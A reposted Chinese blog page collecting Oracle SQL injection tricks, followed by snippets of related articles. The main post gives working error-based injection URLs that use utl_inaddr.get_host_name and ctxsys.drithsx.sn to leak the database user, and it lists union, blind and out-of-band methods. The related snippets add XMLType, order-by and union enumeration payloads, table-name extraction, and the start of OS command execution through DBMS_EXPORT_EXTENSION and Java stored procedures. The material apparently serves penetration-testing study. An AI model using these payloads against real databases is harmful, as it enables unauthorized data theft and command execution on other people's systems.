Oracle 注入技巧收集

最新推荐文章于 2024-12-05 19:01:19 发布
转载 最新推荐文章于 2024-12-05 19:01:19 发布 · 150 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/websec/p/5543866.html
文章标签:

#数据库 #php

本文介绍了针对 Oracle 数据库的 SQL 注入技术,包括利用报错信息进行用户名爆破及信息提取的方法,同时也探讨了在无报错信息情况下通过联合查询、盲注等手段获取数据的策略。

---恢复内容开始---

一、报错注入

(1)爆用户名(适用于:Oracle8,9和10g):

http://192.168.2.10/ora2.php?name=1' and 1=utl_inaddr.get_host_name((select user from dual))--

(2)基于报错注入(适用于Oracle 11g)取信息:

ctxsys.drithsx.sn(1,(SQL语句))

例如:

http://192.168.2.10/ora1.php?name=' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--

二、无报错信息

可通过以下几种方式来实现提取数据:

  (1)联合查询;

  (2)盲注;

  (3)Heavy Queries

  (4)Out Of Band Channels(带外通道)

 

---恢复内容结束---

转载于:https://www.cnblogs.com/websec/p/5543866.html

oracle技巧部分
06-18
本资料包聚焦于“Oracle技巧部分”,涵盖了Oracle数据库的高级查询技巧,以及如何在Java环境中有效地操作Oracle数据库。 一、Oracle查询优化 1. **子查询优化**:理解子查询的执行顺序和优化方法,如使用 EXISTS ...
Oracle查询优化改写 技巧与案例
10-23
本篇将围绕Oracle查询优化改写的技巧与实际案例进行深入探讨。 一、了解执行计划 在Oracle中,查询优化是通过执行计划来实现的。理解执行计划可以帮助我们分析SQL语句的运行过程,识别潜在的性能瓶颈。执行计划由...
oracle注入大全
Y1ch0的专栏
12-01 1758
Detecting SQL Injection in Oracle by Pete Finnigan last updated July 22, 2003 --------------------------------------------------------------------------------IntroductionLast year I wrote a two-part
Oracle靶场(手工注入)攻略
最新发布
m0_68706634的博客
12-05 754
是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的⼀组软件产品。是目前世界上使⽤最为广泛的,数据库管理系统。占⽤1521--》JSP inurl:/.jsp?id= 政府/重点单位。
干货 | Oracle注入和漏洞利用姿势总结
Javachichi的博客
01-17 3136
Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。
oracle数据库注入实战
热门推荐
CClarence的专栏
11-12 1万+
url:http://xxx.com/ID=1010 1.检查注入点以及数据库类型。url后加’ http://xxx.com/ID=1010’ 报错,可推断ID为注入点。ORA-xxxxx这种类型为oracle特有报错方式,所以判断为数据库oracle。 2.判断字段个数。 url后加’ order by number– 到8能正常显示,故字段数为8. 3.确定每个字段类型。
ORACLE ORA600之SQL注入攻击一
clm20482的博客
03-22 219
2016年第一季度某平台的巡检中,在oracle数据库的告警日志中发现如下报错: 根据告警信息查看相关的trc文件: Trace file /home/orabase/diag/rdbms/****/****/t...
Oracle Developer实用开发技巧与指南
Oracle Developer开发指南会指导开发者如何进行安全编码,保护应用程序免受SQL注入等常见攻击,并介绍如何遵循Oracle推荐的开发实践。 ### 知识点九:持续学习与资源 Oracle不断更新其技术和工具,因此开发者需要...
Oracle数据库SQL优化技巧要点总结
在深入探讨Oracle优化原则之前,首先需要明确,Oracle数据库是一个全面的、高性能的数据库管理系统,其设计目标是实现数据的高可用性、可靠性、...通过逐步实践和学习,能够更有效地掌握和应用Oracle优化的策略和技巧
Oracle数据库SQL性能优化技巧
- 定期执行ANALYZE命令收集表和索引的统计信息,有助于COST优化器做出更准确的决策。 - 分析应在数据变化显著后进行,以保持统计信息的时效性。 7. **查询改写**: - Oracle的查询改写功能允许优化器根据统计...
三种不需要盲注的oracle注入工具
cnbird's blog
10-23 3611
E:\tools>OraInj-error.pl “http://www.mic*.com/index.php?id=421″   ========================================================================== Oracle Injection with Display errors v0.8 beta
Oracle注入
时光凉春衫薄的博客
02-26 1337
Oracle注入 1.首先order by 数量确定列的数量 2.然后union select null,’null’,null from admin   必须用null如果返回错入则代表引号内的列不是字符列,直到返回正确的为止 3.判断一下数据库中的表网址后面加上and (select count(*) from admin) <>0 返回正常,说明存在admin表。如果返回错...
oracle的java存储过程执行系统命令
hongyidth的博客
03-17 651
这两天折腾着做了个用oracle的java存储过程执行系统命令的功能,在网上找了很多资料,总算解决了,整理出来,顺便复习一下 [b][color=red]需求[/color][/b]是: 在数据库中有个job定时执行某任务,其中需要调用操作系统命令生成多个文件夹和文件内容,并把他们打包. [b][color=red]环境[/color][/b]是: linux AS3 ,oracle 9....
oracle 注入整理
p656456564545的专栏
10-22 4112
http://www.freebuf.com/articles/web/5411.html  demo 第一种方法http://www.xxox.cn/XXX/AA.php?id=1 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from
oracle注入方法,oracle注入方法
weixin_36399446的博客
04-08 492
①判断是否为Oralce数据库:And 0<>(select count(*) from dual) 返回正常页面表示为Oracle数据库②猜解字段数量:使用order by 或者group by逐个提交数字 直到回显错误页面③列出字段数目 比如6个字段数目and 1=1 null,null,null,null,null,null from dual—因为ORACLE数据库是不自动匹...
ORACLE执行命令
cnbird's blog
12-23 2173
http://notsosecure.com/folder2/ora_cmd_exec.txt 1. select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACT
利用oracle执行系统命令
一个码农的笔记
04-11 6134
c:\1.sql create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime
利用oracle存储过程执行操作系统命令
cuanwei9356的博客
02-10 528
以下方法在WINNT,LINUX下的oracle9i上测试通过,java过程调用系统命令    首先给使用java存储过程的用户授予一定的权限  <>表示所有文件,也可以单独指定文件。  r w e d表示四种操作 ...
Oracle手工注入命令总结
OKAY_TC的博客
07-05 1638
//若过滤了"" '', 可用not in ('字段')代替 //若过滤了<>,可用!=代替 1. 表名爆破 //返回一条数据 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1)) 2. 字段爆破 and 1=ctxsys.drithsx.sn(1,(select col...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值